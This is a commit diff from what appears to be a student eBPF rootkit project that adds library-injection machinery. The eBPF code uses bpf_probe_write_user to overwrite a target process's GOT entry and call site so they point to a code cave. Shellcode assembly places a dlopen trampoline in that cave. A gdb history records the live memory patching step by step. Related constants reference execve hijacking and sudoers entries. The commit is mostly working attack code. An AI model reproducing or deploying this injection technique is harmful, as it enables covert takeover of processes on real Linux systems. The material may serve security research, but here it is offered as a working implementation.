Updated helpers and added resources to help with lib injection

resources/example_dlopen.c

@@ -0,0 +1,15 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <dlfcn.h>
+
+int main(int argc, char* argv[]){
+    
+    void *handle = dlopen("/home/osboxes/TFG/src/helpers/injection_lib.so", RTLD_LAZY);
+    
+    if(handle==NULL){
+        perror(dlerror());
+    }
+
+    return 0;
+}

resources/libinjection_shellcode.asm

@@ -0,0 +1,13 @@
+<nop>
+push rax # 50
+push rdx # 52
+push rsi # 56
+push rdi # 57
+mov rax, <dlopen> # 48b8 <addr little endian> --> gdb: set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
+jmp rax # ffe0  --> gdb: set *(int64_t *)0x402e9d = 0xe0ff0000
+
+pop rdi 
+pop rsi
+pop rdx
+pop rax
+ret

src/common/constants.h

@@ -19,7 +19,7 @@
 #define STRING_FS_SUDOERS_ENTRY_LEN 37
 
 //EXECUTION HIJACKING
-#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
+#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated\0"
 
 
 //LIBRARY INJECTION WITH ROP

src/ebpf/include/bpf/injection.h

@@ -14,6 +14,7 @@
 #define OPCODE_JUMP_BYTE_0 0xe8
 #define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
 #define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
+#define CODE_CAVE_ADDRESS 0x0000000000402e95
 
 struct sys_timerfd_settime_enter_ctx {
     unsigned long long unused; //Pointer to pt_regs
@@ -66,7 +67,7 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
         //bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
         return -1;
     }
-    
+
     //We have localized the call instruction and thus quite probably the saved RIP. 
     //We proceed to get the offset of the call.
     __u32 offset;
@@ -121,6 +122,21 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
         }
         bpf_probe_read_user(&got_addr, sizeof(__u64), j_addr);
         bpf_printk("GOT_ADDR: %lx\n",got_addr);
+
+        __u64 buf = CODE_CAVE_ADDRESS;
+        bpf_printk("Now writing to J_ADDR %lx\n", j_addr);
+        if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){
+            bpf_printk("FAILED TO WRITE J\n");
+        }else{
+            __u64 got_addr_new;
+            bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr);
+            bpf_printk("Success, new GOT is %lx", got_addr_new);
+        }
+        bpf_printk("Now writing to CALL_ADDR %lx\n", call_addr);
+        if(bpf_probe_write_user(call_addr, &buf, sizeof(__u64))<0){
+            bpf_printk("FAILED TO WRITE CALL\n");
+        }
+
         //Now that we have the address placed in the GOT section we can finally go to the function in glibc
         //where the syscall resides. We read the opcodes and check that they are the ones expected
         __u8 s_opcode[14];
@@ -180,7 +196,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
     __u64 address = 0;
     bpf_printk("Timer %i to scan at address %lx\n", fd, scanner);
     #pragma unroll
-    for(__u64 ii=0; ii<100; ii++){
+    for(__u64 ii=0; ii<200; ii++){
         //We got a foothold in the stack via the syscall argument, now we scan to lower memory
         //positions assuming those are the saced RIP. We will then perform checks in order to see
         //if it truly is the saved RIP (checking that there is a path to the actual syscall).
@@ -210,7 +226,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
         }
     }
 
-    
+    bpf_printk("Finished without findings\n");
 
 
     return 0;
@@ -272,6 +288,7 @@ int uprobe_execute_command(struct pt_regs *ctx){
     }
     //bpf_printk("Stack: %x\n", dest_buf);
 
+    
     return 0;
 }
 

src/helpers/.gdb_history

@@ -1,172 +1,256 @@
-disass main
-checksec bof
-checksec 
-quit
-disass test_time_values_injection 
-disass test_time_values_injection+74 
-b test_time_values_injection+74 
-b test_time_values_injection + 74 
-b *(test_time_values_injection + 74) 
-r
-si
-si
-si
-si
 q
-b timerfd_settime
+find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
+b *(test_time_values_injection+77 )
 r
-context
-q
-disass test_time_values_injection 
-b *(test_time_values_injection +74)
-r
-si
-si
-q
-b test_time_values_injection +74
-b (test_time_values_injection +74)
-b *(test_time_values_injection +74)
-r
-si
-display/i $pc
-si
-si
-si
-q
-disass test_time_values_injection 
-b *(test_time_values_injection +116)
-r
-si
-si
-q
-b *(test_time_values_injection +116)
-r
-si
-d/i 0x405130
-d/i2 0x405130
-display/i2 0x405130
-display/i 0x405130
-display/i4 0x405130
-display/2i 0x405130
-display/10i 0x405130
-disassemble /r 0x405130
-disassemble /r 0x6095d8f7ff7f
-disassemble /r 0x6095d8f7ff7f00
-disassemble /r 0x6095d8f7ff7f0000
-disassemble /r 0x6095d8f7ff7f00007612
-disassemble /r 0x6095d8f7ff7f000076
-disassemble /r 0x6095d8f7ff7f0000
-disassemble /r 0x00007ffff7d89560
-d/10i 0x00007ffff7d89560
-context
-disassemble /r 0x405130
-d/10i 0x7ffff7d89560
-disassemble 0x7ffff7d89560
-disassemble /r 0x7ffff7d89560
-disassemble timerfd_settime
-disassemble __libc_start_main 
-q
-disass test_time_values_injection 
-b *(test_time_values_injection+74)
-r
-si
-ni
-si
-disass timerfd_settime
-b 0x00007ffff7d89560
 b __timerfd_settime 
+c
+find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
+x/128i 0x402e95
+x/128x 0x402e95
+x/128x 0x402e90
+x/128i 0x402e90
+x/128i 0x402e89
+x/10i 0x402e89
+x/10i 0x402e90
+x/10i 0x402e80
+x/128i 0x402e89
+x/256i 0x402e89
+x/256i 0x402e90
+find 0x90909090909090909090909090909090 0x401000 0x403000
+context
+x/10i 401520
+x/10i 0x401520
+x/10i 0x401260
+x/10i 0x401250
+q
+r
+disass /r 0x405130
+x/10i 0x401520
+q
+b *(test_time_values_injection+77 )
+disass /r test_time_values_injection
+b *(test_time_values_injection+169)
+r
+b __timerfd_settime 
+c
+x/10i 0x401250
+x/10i 0x401260
+x/10i 0x405130
+x/10 0x405130
+x/10x 0x405130
+c
+x/10x 0x405130
+x/10i 0x405130
+c
+x/10i 0x405130
+si
+c
+r
+q
+r
+b *0x4013a8
 r
 r
 r
+b test_time_values_injection 
 r
+s
+q
+b test_time_values_injection 
 r
+b 0x4013a8
+b *0x4013a8
+b *0x4013a4
 r
+q
+b *0x4013a8
 r
+b test_time_values_injection 
 r
+n
+q
+b test_time_values_injection 
 r
+n
+ni
 del 1
+del 2
+r
+b test_time_values_injection 
 r
 q
-b __timerfd_settime 
-b timerfd_S
-b timerfd_settime
 r
 q
-b timerfd_settime
-r
-si
-ni
-disass timerfd_settime
-disass /r timerfd_settime
-q
-b timerfd_settime
-r
-si
-ni
-disass /r timerfd_settime
-r
-si
-ni
-q
-b timerfd_settime
-r
-si
-ni
-stack 200
-q
-b timerfd_settime
-r
-si
-ni
-d/10i 0x7ffff7d89560
-d/i 0x7ffff7d89560
-disassemble 0x7ffff7d89560
-stack 30ç
-d/6x 7fffffffdcc8
-d/x 7fffffffdcc8
-p/x 7fffffffdcc8
-p/x 0x7fffffffdcc8
-d/x 0x7fffffffdcc8
-d/3x 0x7fffffffdcc8
-d/3x *0x7fffffffdcc8
-x/3x 0x7fffffffdcc8
-x/5i 0x7fffffffdcc8
-x/5x 0x7fffffffdcc8
-x/20x 0x7fffffffdcc8
-stack 
-p __libc_start_main 
-x/x __libc_start_main 
-stack 
-context
-context_code
-x/x __libc_start_main 
-q
-b timerfd_settime
-r
-si
-ni
-x/x __libc_start_main 
-x/x __libc_dlopen_mode
-rop
-ropsearch 0f 
-ropsearch "0f"  
-ropsearch "0f"  libc
-ropsearch "pop %rax" libc
-ropsearch "pop %rax" 
-ropsearch "pop %rax" 
-ropsearch "pop rax" 
-ropsearch "pop rax" libc
-ropsearch "pop eax" libc
-ropgadget 
-ropgadget libc
-help ropgadget
-help ropsearch
-ropsearch "pop eax" libc
-q
-disass main
-l test_time_values_injection 
 disass test_time_values_injection 
-b *(test_time_values_injection + 74)
+q
 r
+q
+si
+b test_time_values_injection 
+r
+b __timerfd_settime 
+r
+c
+del 1
+x/10i 0x405130
+c
+r
+b test
+q
+b test_time_values_injection 
+r
+n
+ni
+si
+ni
+si
 si
 q
+b test_time_values_injection 
+r
+x/10x 0x402e95
+x/10x 0x405130
+checksecq
+q
+checksecq
+checksec
+q
+checksec
+q
+q
+q
+q
+x/10x 0x402e95
+b test_time_values_injection 
+r
+x/10x 0x402e95
+x/10x 0x405130
+b __timerfd_settime 
+c
+x/10x 0x405130
+c
+x/10x 0x405130
+q
+b test_time_values_injection 
+r
+b __timerfd_settime 
+c
+si
+x/10x 0x405130
+disass test_time_values_injection 
+b *(test_time_values_injection+169 )
+c
+si
+x/10x 0x402e95
+q
+b test_time_values_injection 
+r
+b __timerfd_settime 
+c
+x/10x 0x402e95
+x/10x 0x405130
+si
+x/10x 0x405130
+b *(test_time_values_injection+169 )
+c
+si
+set *(int64_t *)0x402e95 0x10
+set *(int64_t *)0x402e95 = 0x10
+x/10x 0x405130
+x/10x 0x402e95
+set *(int64_t *)0x402e95 = 0x102131415161718191
+set *(int64_t *)0x7ffff7d89560 = 
+x/10x 0x402e95
+x/10i 0x402e95
+x/10b 0x402e95
+set *(int64_t *)0x402e95 = 0x50
+x/10b 0x402e95
+x/10i 0x402e95
+x/10i 0x7ffff7d89560
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
+x/10i 0x402e95
+x/10b 0x402e95
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
+x/10b 0x402e95
+x/10i 0x402e95
+disass /r 0x402e95
+disass 0x402e95
+disass /r *0x402e95
+x/10i 0x402e95
+x/10x 0x405130
+x/10i 0x405130
+x/10i 0x401260
+x/10b 0x401260
+x/10i 0x402e95
+x/10b 0x401260
+x/10i 0x402e95
+x/10b 0x402e95
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
+set *(int64_t *)0x402e9d = 0xffe0
+x/10b 0x402e95
+context
+si
+x/10i 0x402e95
+si
+q
+b test_time_values_injection 
+r
+b *(test_time_values_injection+169)
+r
+c
+x/10i 0x402e95
+x/10b 0x401260
+x/10x 0x405130
+si
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
+x/10b 0x402e95
+x/10i 0x402e95
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
+x/10b 0x402e95
+set *(int64_t *)0x402e9d = 0x0000ffe0
+x/10b 0x402e95
+set 0x402e9d = 0xffe000000
+x/10b 0x402e95
+x/12b 0x402e95
+x/10i 0x402e95
+set 0x402e95 = 0x48B86095D8F7FF7F0000
+set 0x402e95 = 0x48B86095D8F7FF7F
+set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
+x/10b 0x402e95
+x/14b 0x402e95
+x/20b 0x402e95
+set *(int64_t *)0x402e9d = 0x0000ffe0
+x/20b 0x402e95
+x/20i 0x402e95
+x/20b 0x402e95
+x/10i 0x401230
+disass /r test_time_values_injection 
+x/10i 0x4013a0
+x/10b 0x4013a0
+x/20b 0x402e95
+set *(int64_t *)0x402e9d = 0xffe000000
+x/20b 0x402e95
+set *(int64_t *)0x402e9d = 0xffe00000
+x/20b 0x402e95
+x/10i 0x4013a0
+x/20i 0x402e95
+x/20b 0x402e95
+set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
+x/20b 0x402e95
+x/20i 0x402e95
+set *(int64_t *)0x402e9d = 0xe0ff00000
+x/20i 0x402e95
+x/20b 0x402e95
+set *(int64_t *)0x402e9d = 0xe0ff0000
+x/20i 0x402e95
+set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
+x/20i 0x402e95
+context
+si
+si
+si
+si
+si
+c
+q

src/helpers/Makefile

@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
 	clang -g -c execve_hijack.c
 
 execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
-	clang -lm -g -fno-plt -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
+	clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
 
 clean:
 	-rm -f execve_hijack.o

src/helpers/execve_hijack.c

@@ -24,8 +24,8 @@
 
 int test_time_values_injection(){
 
-    struct itimerspec new_value;
-    int max_exp, fd;
+    struct itimerspec new_value, new_value2;
+    int max_exp, fd, fd2;
     struct timespec now;
     uint64_t exp, tot_exp;
     ssize_t s;
@@ -40,6 +40,16 @@ int test_time_values_injection(){
 
     if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)
         return -1;
+
+    fd2 = timerfd_create(CLOCK_REALTIME, 0);
+    if (fd2 == -1)
+        return -1;
+
+    new_value2.it_interval.tv_sec = 30;
+    new_value2.it_interval.tv_nsec = 0;
+
+    if (timerfd_settime(fd2, TFD_TIMER_ABSTIME, &new_value2, NULL) == -1)
+        return -1;
     
         
     printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);

src/helpers/injection_lib.c

@@ -1,7 +1,10 @@
 #include <stdio.h>
+#include <stdlib.h>
+#include <syslog.h>
 
 __attribute__((constructor))
 static void init()
 {
-    puts("It worked\n");
+    printf("It worked\n");
+    syslog(LOG_CRIT, "Library called\n");
 }

src/helpers/peda-session-execve_hijack.txt

@@ -1,3 +1,4 @@
-break timerfd_settime
-break timerfd_settime
+break test_time_values_injection
+break __dlopen
+break *(test_time_values_injection+169)
 

src/helpers/peda-session-sudo.txt

@@ -0,0 +1,5 @@
+break test_time_values_injection
+disable $bpnum
+break *(test_time_values_injection+169)
+disable $bpnum
+